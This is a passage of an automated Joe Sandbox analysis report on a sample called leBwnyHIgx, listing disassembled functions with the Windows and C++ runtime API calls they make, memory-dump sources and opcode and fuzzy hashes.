                                                                                      • Part of subcall function 0040BFFC: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,?,0040C0BD), ref: 0040C030
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Thread$LanguagesPreferred$Language
                                                                                    • String ID:
                                                                                    • API String ID: 2255706666-0
                                                                                    • Opcode ID: e9b38d102af23e3ac96532df7ba2e3b2cca42ae78a03c66e701db43377d19ec2
                                                                                    • Instruction ID: e50dbe343586da412169edcbcf2f18ed2f71acdc650f4f92d90da3ef9dabf820
                                                                                    • Opcode Fuzzy Hash: e9b38d102af23e3ac96532df7ba2e3b2cca42ae78a03c66e701db43377d19ec2
                                                                                    • Instruction Fuzzy Hash: 11311C70A0021EDBDB10DFE9C885AAEB3B5EF04315F00427AE551E7291DB789A44CB99
                                                                                    Function 00CD4EB7 Relevance: 6.1, APIs: 4, Instructions: 94COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 00CD4ECE
                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,?), ref: 00CD4F28
                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00CD4F40
                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,?,00000000,00000000), ref: 00CD4F8C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2077740458.0000000000CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_cd0000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: ByteCharMultiWide
                                                                                    • String ID:
                                                                                    • API String ID: 626452242-0
                                                                                    • Opcode ID: 2ad7ddd50886c6f136297177ce94159ccb7120c9250006a8d7e0e413235becb2
                                                                                    • Instruction ID: ca365d46edf6424eaebb9e91f037c3e5a45376a2186ba640e2979927dc7fd4cf
                                                                                    • Opcode Fuzzy Hash: 2ad7ddd50886c6f136297177ce94159ccb7120c9250006a8d7e0e413235becb2
                                                                                    • Instruction Fuzzy Hash: 4431EFB5E40208BFEB14DBD8CD86FAEB7B5EB48710F204254F615AB2D0D671AB009B55
                                                                                    Function 10013A70 Relevance: 6.1, APIs: 4, Instructions: 77COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,?,?,10017B76,000000FF,?,10013642,?), ref: 10013A90
                                                                                    • ??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,10017B76,000000FF,?,10013642), ref: 10013AAB
                                                                                    • ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(00000000,10013642,?), ref: 10013ADF
                                                                                    • ??1_Lockit@std@@QAE@XZ.MSVCP140(?), ref: 10013B57
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2078710212.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2078692733.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078732895.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078752146.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078770707.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_10000000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Lockit@std@@$??0_??1_Bid@locale@std@@Getcat@?$codecvt@Mbstatet@@@std@@V42@@Vfacet@locale@2@
                                                                                    • String ID:
                                                                                    • API String ID: 1566052064-0
                                                                                    • Opcode ID: fe2f488380e94dcbeb70f586553934bb7d96351eb8217fb32b8625d7819b8d05
                                                                                    • Instruction ID: 47359edd55c6cc15742bff4ced4580a4001c133a1fe49908c7c5117e5c40c52a
                                                                                    • Opcode Fuzzy Hash: fe2f488380e94dcbeb70f586553934bb7d96351eb8217fb32b8625d7819b8d05
                                                                                    • Instruction Fuzzy Hash: DD3141B4D00259DFDB04DF94D981BEEBBB4FF48310F208659E52667391DB34AA84CBA1
                                                                                    Function 100163BC Relevance: 6.1, APIs: 4, Instructions: 76COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __RTC_Initialize.LIBCMT ref: 10016409
                                                                                      • Part of subcall function 10016CAE: InitializeSListHead.KERNEL32(1001C360,10016413,10019C58,00000010,100163A4,?,?,?,100165CA,?,00000001,?,?,00000001,?,10019CA0), ref: 10016CB3
                                                                                    • _initterm_e.API-MS-WIN-CRT-RUNTIME-L1-1-0(100182EC,100182F0,10019C58,00000010,100163A4,?,?,?,100165CA,?,00000001,?,?,00000001,?,10019CA0), ref: 10016422
                                                                                    • _initterm.API-MS-WIN-CRT-RUNTIME-L1-1-0(100182CC,100182E8,10019C58,00000010,100163A4,?,?,?,100165CA,?,00000001,?,?,00000001,?,10019CA0), ref: 10016440
                                                                                    • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 10016473
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2078710212.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2078692733.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078732895.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078752146.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078770707.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_10000000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image_initterm_initterm_e
                                                                                    • String ID:
                                                                                    • API String ID: 590286634-0
                                                                                    • Opcode ID: c66be37b7fa5c5e393c4edeaf5cfb5ebc56572853e82811de3f62df1bd00dbee
                                                                                    • Instruction ID: e11346addbbd0b20877a0dd20a8321200fe6c64d5ca488d70c2580f7c5b0b6f1
                                                                                    • Opcode Fuzzy Hash: c66be37b7fa5c5e393c4edeaf5cfb5ebc56572853e82811de3f62df1bd00dbee
                                                                                    • Instruction Fuzzy Hash: 0C212439544215ABEF01DBB49C027DD37A1EF0E3A4F108009F5966F1C2CB32E6C5C6AA
                                                                                    Function 004733A4 Relevance: 6.1, APIs: 4, Instructions: 59registryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetClassInfoW.USER32(00400000,00473388,?), ref: 004733C5
                                                                                    • UnregisterClassW.USER32(00473388,00400000), ref: 004733EE
                                                                                    • RegisterClassW.USER32(0065F688), ref: 004733F8
                                                                                    • SetWindowLongW.USER32(00000000,000000FC,00000000), ref: 00473443
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Class$InfoLongRegisterUnregisterWindow
                                                                                    • String ID:
                                                                                    • API String ID: 4025006896-0
                                                                                    • Opcode ID: 77c002dd57727ae1c120746f698cf05d15210d6afcb35098894f7f7bfabb7748
                                                                                    • Instruction ID: a8c172639951b3e6cb5da7468db87f3e5ba31e7f9e45713803e63bcfa106701e
                                                                                    • Opcode Fuzzy Hash: 77c002dd57727ae1c120746f698cf05d15210d6afcb35098894f7f7bfabb7748
                                                                                    • Instruction Fuzzy Hash: 100188717001046BCB10FF68ED81FDB739AE718306F109226F908E73A1DABADD558759
                                                                                    Function 10011F50 Relevance: 6.1, APIs: 4, Instructions: 58COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 10011F5D
                                                                                    • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 10011F6A
                                                                                    • ?egptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 10011F75
                                                                                    • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 10011F82
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2078710212.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2078692733.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078732895.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078752146.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078770707.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_10000000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: D@std@@@std@@U?$char_traits@$?gptr@?$basic_streambuf@$?egptr@?$basic_streambuf@
                                                                                    • String ID:
                                                                                    • API String ID: 2950233615-0
                                                                                    • Opcode ID: 1e4bcc0d99ed487de32ae37c9549659cbe616bda3220ddbe920771c154be9835
                                                                                    • Instruction ID: d4953d2e9632dab8d67af48db5b56fd773fcfbd27f84caad3cc3cb56b92c495c
                                                                                    • Opcode Fuzzy Hash: 1e4bcc0d99ed487de32ae37c9549659cbe616bda3220ddbe920771c154be9835
                                                                                    • Instruction Fuzzy Hash: FA110D74E00119EFCB58DFA4D9959EDB7B5FF48200B1181A9E805AB351EB30EF45DB90
                                                                                    Function 005A3D7C Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • IsWindowVisible.USER32(?), ref: 005A3D8F
                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 005A3DD1
                                                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 005A3DEB
                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,C31852FF,?,00000000,?,005A3EA5,?,?,?,00000000), ref: 005A3E13
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Long$Visible
                                                                                    • String ID:
                                                                                    • API String ID: 2967648141-0
                                                                                    • Opcode ID: 3701598597631481a4bebe85878359a59fd4de1d73864697aee8f0662b462547
                                                                                    • Instruction ID: a7e9761be64e8251a726e41e5ea799dd36543e273c62785c0243dde29f2c5ab3
                                                                                    • Opcode Fuzzy Hash: 3701598597631481a4bebe85878359a59fd4de1d73864697aee8f0662b462547
                                                                                    • Instruction Fuzzy Hash: 50115670205144AFDB10EB29D889FA97FD9BB45356F448595F844CF361C774EE80C790
                                                                                    Function 004F9144 Relevance: 6.0, APIs: 4, Instructions: 35threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetWindowThreadProcessId.USER32(00000000), ref: 004F9151
                                                                                    • GetCurrentProcessId.KERNEL32(?,00000000,00000000,005A4B86,?,?,00000000,00000001,005A2E83,?,?,?,?,00000000), ref: 004F915A
                                                                                    • GlobalFindAtomW.KERNEL32(00000000,?,00000000,00000000,005A4B86,?,?,00000000,00000001,005A2E83,?,?,?,?,00000000), ref: 004F916F
                                                                                    • GetPropW.USER32(00000000,00000000), ref: 004F9186
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$AtomCurrentFindGlobalPropThreadWindow
                                                                                    • String ID:
                                                                                    • API String ID: 2582817389-0
                                                                                    • Opcode ID: 25ecc4edb2365f2cde5ab71ba1d4f521c8a402254a91719a356be1fc28b1867b
                                                                                    • Instruction ID: 6cdfd07cd157af09d6636e7e024685bcdc2838eed951bc29520a0badc25c7c68
                                                                                    • Opcode Fuzzy Hash: 25ecc4edb2365f2cde5ab71ba1d4f521c8a402254a91719a356be1fc28b1867b
                                                                                    • Instruction Fuzzy Hash: 32F0306260021666B72477B6AE85AFB328C8A057A5740297FFA01D7216D57CCC8283BD
                                                                                    Function 00644688 Relevance: 6.0, APIs: 4, Instructions: 34sleepCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$CountSleepTick
                                                                                    • String ID:
                                                                                    • API String ID: 2227064392-0
                                                                                    • Opcode ID: 0d34409079f3285415336e5086e324ebfbbd45d85097019a7f8f2458989eb29f
                                                                                    • Instruction ID: 8c410b6b5025aaf122e9bdc0c1ce3c8724fef5309a0de07dabf959826b4bab6c
                                                                                    • Opcode Fuzzy Hash: 0d34409079f3285415336e5086e324ebfbbd45d85097019a7f8f2458989eb29f
                                                                                    • Instruction Fuzzy Hash: 40E0E57230C2410EA32032AE18866BE594BDA97394F35097BF180C1216CD088C968136
                                                                                    Function 10012C30 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ?eback@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(?,?,10012136), ref: 10012C3A
                                                                                    • ?eback@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(?,10012136), ref: 10012C4D
                                                                                    • ?egptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(?,10012136), ref: 10012C5C
                                                                                    • ?setg@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXPAD00@Z.MSVCP140(100120FA,100120FA,100120F9,?,10012136), ref: 10012C80
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2078710212.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2078692733.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078732895.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078752146.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078770707.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_10000000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: D@std@@@std@@U?$char_traits@$?eback@?$basic_streambuf@$?egptr@?$basic_streambuf@?setg@?$basic_streambuf@D00@
                                                                                    • String ID:
                                                                                    • API String ID: 3089488326-0
                                                                                    • Opcode ID: 31da55f76b99386bfca52db2829809a8af7d29f5ef04e72f75014f1d39d39b3f
                                                                                    • Instruction ID: 718b455e6a9fe28b5531d214fab6855221ed4fdccad38d515428ce19cb46a070
                                                                                    • Opcode Fuzzy Hash: 31da55f76b99386bfca52db2829809a8af7d29f5ef04e72f75014f1d39d39b3f
                                                                                    • Instruction Fuzzy Hash: 97F0AF74901108EFCB48DF98CD9599EB7B6FF48305B20819AE406A3351DB31AF15DB54
                                                                                    Function 0063DA44 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetCurrentProcess.KERNEL32(00000008), ref: 0063DA4D
                                                                                    • OpenProcessToken.ADVAPI32(00000000,00000008), ref: 0063DA53
                                                                                    • GetTokenInformation.ADVAPI32(00000008,00000012(TokenIntegrityLevel),00000000,00000004,00000008,00000000,00000008), ref: 0063DA75
                                                                                    • CloseHandle.KERNEL32(00000000,00000008,TokenIntegrityLevel,00000000,00000004,00000008,00000000,00000008), ref: 0063DA86
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                                                    • String ID:
                                                                                    • API String ID: 215268677-0
                                                                                    • Opcode ID: 52eacd67af02c92b88f6b7150cd3555fd3abc884029a5d5279a962a9430070f6
                                                                                    • Instruction ID: a157fd3303c1430b13f319c7757610127fd6bd2de266f3ae7d41e5c3beec6acc
                                                                                    • Opcode Fuzzy Hash: 52eacd67af02c92b88f6b7150cd3555fd3abc884029a5d5279a962a9430070f6
                                                                                    • Instruction Fuzzy Hash: 59F030706483006BD700EBA5DD82EDB76DCAF44394F00492EBF94C7291E678D95897A2
                                                                                    Function 004E43D0 Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetDC.USER32(00000000), ref: 004E43D9
                                                                                    • SelectObject.GDI32(00000000,058A00B4), ref: 004E43EB
                                                                                    • GetTextMetricsW.GDI32(00000000), ref: 004E43F6
                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 004E4407
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: MetricsObjectReleaseSelectText
                                                                                    • String ID:
                                                                                    • API String ID: 2013942131-0
                                                                                    • Opcode ID: a6aecb0737437b3e4e44ddca18d58a6d0b7d8c9274c0db10c9c3bc7fb89915e8
                                                                                    • Instruction ID: d4d349d3644daeae5b714f5edb0297babd8c78eacc5647d64bd84649639e733b
                                                                                    • Opcode Fuzzy Hash: a6aecb0737437b3e4e44ddca18d58a6d0b7d8c9274c0db10c9c3bc7fb89915e8
                                                                                    • Instruction Fuzzy Hash: 33E04F617026A126D61161A75D82BEB274C4F423AAF08012AFD54D92E3DA4DCD62C2FA
                                                                                    Function 10016BF4 Relevance: 6.0, APIs: 4, Instructions: 25timethreadCOMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetSystemTimeAsFileTime.KERNEL32(00000001), ref: 10016C06
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 10016C15
                                                                                    • GetCurrentProcessId.KERNEL32 ref: 10016C1E
                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 10016C2B
                                                                                    Memory Dump Source
